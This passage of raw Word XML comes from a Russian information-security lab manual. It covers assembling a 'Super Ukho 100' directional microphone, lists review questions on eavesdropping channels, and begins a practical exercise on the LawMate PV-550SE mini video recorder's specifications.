          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1. Достаньте микрофон направленного действия "Супер Ухо 100" из упаковки. И снимите защитный полиэтилен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2. Снизу ручки выкрутите болт и откройте отсек для "Кроны"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3. Подключите "Крону" к переходнику внимательно соблюдая полярность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4. Закройте крышку обратно, закрутите болт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5. При помощи 2-х зажимов прикрепите параболическую пластиковую тарелку к микрофону направленного действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6. Подсоедините стерео наушники к усилителю через порт, который находится на левом боку усилителя. Наденьте наушники и включите усилитель переключателем, расположенным на правом боку усилителя. Поворачивая колесо переключателя, отрегулируйте мощность звука. Наушники имеют изменяющийся головной ободок, который позволяет разместить их на голове максимально комфортно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="003662D2" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7. Направьте прибор в сторону исследуемого объекта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007075A6" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Контрольные вопросы для защиты практической работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007075A6" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:t>Как применяется микрофон направленного действия (направленный микрофон) «Супер Ухо 100»?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007075A6" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:t>Для чего нужен микрофон направленного действия «Супер Ухо 100»?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007075A6">
        <w:t>Какие основные технические характеристики микрофона вы знаете?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD712C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc3808629"/>
      <w:r>
        <w:t>Вопросы для защиты  работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc3808630"/>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Вопрос 1. направленные микрофоны, проводные системы, портативные диктофоны и электронные стетоскопы;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc3808631"/>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Вопрос 2. Радиомикрофоны;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc3808632"/>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Вопрос 3. Гидроакустические датчики;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc3808633"/>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Вопрос 4. СВЧ и ИК передатчики(П)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3531"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007F03F1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc508055971"/>
      <w:bookmarkStart w:id="94" w:name="_Toc3808634"/>
      <w:r w:rsidRPr="007F03F1">
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:bookmarkStart w:id="95" w:name="_Toc508055972"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F03F1">
        <w:t>Видеорегистратор LawMate PV-550SE с камерой 618СА</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007F03F1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00386DFD" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00386DFD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00386DFD">
        <w:t>изучить характери</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">стики и проанализировать работу </w:t>
      </w:r>
      <w:r w:rsidRPr="00386DFD">
        <w:t>видеорегистратора LawMate PV-550SE с камерой 618СА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00386DFD" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DFD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Видеорегистратор  PV-550 SE ( макс. карта памяти SDHC до 32Gb )</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>название на русском языке: ПВ - 550 С Е </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Видеорегистратор PV-550SE для видеонаблюдения и записи видео сигнала на карту памяти до 32Gb. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Миниатюрный Видео Регистратор с функцией подключения мини видеокамер, микро камер.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Наличие специального разъема, в котором присутствует </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для питания микрокамер или миникамер.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подключение и запись внешнего аналогового видео аудио сигнала.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075405A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запись по программному датчику движения. Запись по кругу. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Максимальное разрешение видео записи 720</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>576.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r w:rsidRPr="0075405A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-550</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SE</w:t>
      </w:r>
      <w:r w:rsidRPr="0075405A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет компактный размер. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Автономная работа от Сменного аккумулятора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Возможность подключение внешнего аккумулятора для продолжительной автономной работы.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Постоянная работа и зарядка от сетевого адаптера подключенного к </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>220</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Поддержка памяти </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> до 32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с файловой системой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Просмотр изображения на встроенном экране. Наличие динамика для прослушивания записей.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Кнопки на корпусе </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-550</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для настройки и управления видеорегистратором.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Специальная кнопка на проводе для включения видеорегистратора </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-550</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и начала записи.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
